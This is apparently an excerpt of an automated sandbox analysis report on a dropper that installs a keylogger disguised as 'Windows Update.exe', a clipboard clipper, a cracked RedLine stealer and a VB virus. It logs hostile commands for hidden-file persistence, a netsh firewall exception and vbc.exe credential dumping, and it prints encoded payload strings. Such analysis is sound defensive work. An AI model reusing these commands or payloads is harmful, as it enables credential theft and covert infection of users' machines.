                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: String function: 00D8BA9D appears 35 times
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: String function: 007ABA9D appears 35 times
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_0562691A NtUnmapViewOfSection,
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_056252BA NtQuerySystemInformation,
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_056268D6 NtUnmapViewOfSection,
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_05625280 NtQuerySystemInformation,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                  Source: Hpdyv8oO3j.exe, 00000000.00000002.322128416.0000000000585000.00000004.00020000.sdmpBinary or memory string: OriginalFilenamemicrostub.exe, vs Hpdyv8oO3j.exe
                  Source: Hpdyv8oO3j.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                  Source: C:\Windows\SysWOW64\user32dll.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeFile created: C:\Users\user\AppData\Roaming\Windows Update.exeJump to behavior
                  Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@53/24@7/7
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: Windows Update.exe.2.dr, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 17.0.Windows Update.exe.d40000.8.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 17.2.Windows Update.exe.d40000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 17.0.Windows Update.exe.d40000.12.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 2.0.Keylogger.exe.760000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: Keylogger.exe.0.dr, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 17.0.Windows Update.exe.d40000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 2.2.Keylogger.exe.760000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: WindowsUpdate.exe.17.dr, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeCode function: 0_2_0040135A GetSystemDirectoryA,PathAddBackslashA,GetWindowsDirectoryA,GetTempPathA,GetModuleFileNameA,GetEnvironmentVariableA,FindResourceA,SizeofResource,LoadResource,LockResource,GlobalAlloc,RtlMoveMemory,GlobalAlloc,RtlMoveMemory,GlobalFree,lstrcpynA,lstrcpyA,lstrlenA,lstrcpyA,lstrlenA,lstrcpyA,lstrcatA,lstrcpyA,CreateFileA,WriteFile,HeapAlloc,WriteFile,HeapFree,CreateFileA,GetFileSize,CloseHandle,HeapAlloc,WriteFile,HeapFree,CloseHandle,FindCloseChangeNotification,GlobalFree,SetFileAttributesA,lstrcpyA,PathFindFileNameA,ShellExecuteA,FreeResource,ExitProcess,ExitProcess,
                  Source: ViRuS.exe, 00000008.00000002.329432377.0000000000401000.00000020.00020000.sdmp, user32dll.exe, 00000013.00000000.354827611.0000000000401000.00000020.00020000.sdmpBinary or memory string: @*\AC:\Kuzja 1.4\vir.vbpd
                  Source: ViRuS.exeBinary or memory string: *\AC:\Kuzja 1.4\vir.vbp
                  Source: ViRuS.exe, 00000008.00000002.329438732.0000000000407000.00000004.00020000.sdmp, user32dll.exe, 00000013.00000002.357757448.0000000000407000.00000004.00020000.sdmpBinary or memory string: $@*\AC:\Kuzja 1.4\vir.vbp
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\HOST.bat" "
                  Source: Hpdyv8oO3j.exeMetadefender: Detection: 74%
                  Source: Hpdyv8oO3j.exeReversingLabs: Detection: 100%
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\Hpdyv8oO3j.exe "C:\Users\user\Desktop\Hpdyv8oO3j.exe"
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Users\user\AppData\Local\Temp\Keylogger.exe "C:\Users\user\AppData\Local\Temp\Keylogger.exe"
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Users\user\AppData\Local\Temp\hhzclipper.exe "C:\Users\user\AppData\Local\Temp\hhzclipper.exe"
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe "C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe"
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe "C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe"
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\HOST.bat" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Users\user\AppData\Local\Temp\ViRuS.exe "C:\Users\user\AppData\Local\Temp\ViRuS.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\system32\user32dll.exe
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im "ViRuS.exe"
                  Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess created: C:\Users\user\AppData\Roaming\RedLine.exe "C:\Users\user\AppData\Roaming\RedLine.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                  Source: unknownProcess created: C:\Windows\SysWOW64\user32dll.exe "C:\Windows\SysWOW64\user32dll.exe"
                  Source: C:\Windows\SysWOW64\user32dll.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im "user32dll.exe"
                  Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\RedLine.exe" "RedLine.exe" ENABLE
                  Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2528
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\RedLine.exe "C:\Users\user\AppData\Roaming\RedLine.exe" ..
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe "C:\Users\user\AppData\Roaming\WindowsUpdate.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\RedLine.exe "C:\Users\user\AppData\Roaming\RedLine.exe" ..
                  Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe "C:\Users\user\AppData\Roaming\WindowsUpdate.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\RedLine.exe "C:\Users\user\AppData\Roaming\RedLine.exe" ..
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2472
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                  Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7156 -s 176
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Users\user\AppData\Local\Temp\Keylogger.exe "C:\Users\user\AppData\Local\Temp\Keylogger.exe"
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Users\user\AppData\Local\Temp\hhzclipper.exe "C:\Users\user\AppData\Local\Temp\hhzclipper.exe"
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe "C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe"
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe "C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe"
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\HOST.bat" "
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Users\user\AppData\Local\Temp\ViRuS.exe "C:\Users\user\AppData\Local\Temp\ViRuS.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess created: C:\Users\user\AppData\Roaming\RedLine.exe "C:\Users\user\AppData\Roaming\RedLine.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\system32\user32dll.exe
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im "ViRuS.exe"
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\RedLine.exe" "RedLine.exe" ENABLE
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2528
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                  Source: C:\Windows\SysWOW64\user32dll.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im "user32dll.exe"
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_056251EA AdjustTokenPrivileges,
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_056251B3 AdjustTokenPrivileges,
                  Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;ViRuS.exe&quot;)
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;user32dll.exe&quot;)
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeFile created: C:\Users\user\AppData\Local\Temp\Keylogger.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,
                  Source: Keylogger.exe, Windows Update.exe, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: Keylogger.exe, Windows Update.exe, vbc.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: Keylogger.exe, 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, Windows Update.exe, 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, vbc.exe, 0000001C.00000000.394707935.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: Keylogger.exe, Windows Update.exe, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: Keylogger.exe, Windows Update.exe, vbc.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: Keylogger.exe, Windows Update.exe, vbc.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: Keylogger.exe, Windows Update.exe, vbc.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,
                  Source: Keylogger.exe.0.dr, Form1.csBase64 encoded string: 'Ty3Lk8RnQfYL8aK1VgHq22paeblr7aqlRzHxRfjEXdlNccbW8zqh6kQeot5YJx3a', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                  Source: RedLine.MainPanel-cracked.exe.0.dr, Class1.csBase64 encoded string: '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
                  Source: Windows Update.exe.2.dr, Form1.csBase64 encoded string: 'Ty3Lk8RnQfYL8aK1VgHq22paeblr7aqlRzHxRfjEXdlNccbW8zqh6kQeot5YJx3a', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                  Source: 2.0.Keylogger.exe.760000.0.unpack, Form1.csBase64 encoded string: 'Ty3Lk8RnQfYL8aK1VgHq22paeblr7aqlRzHxRfjEXdlNccbW8zqh6kQeot5YJx3a', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
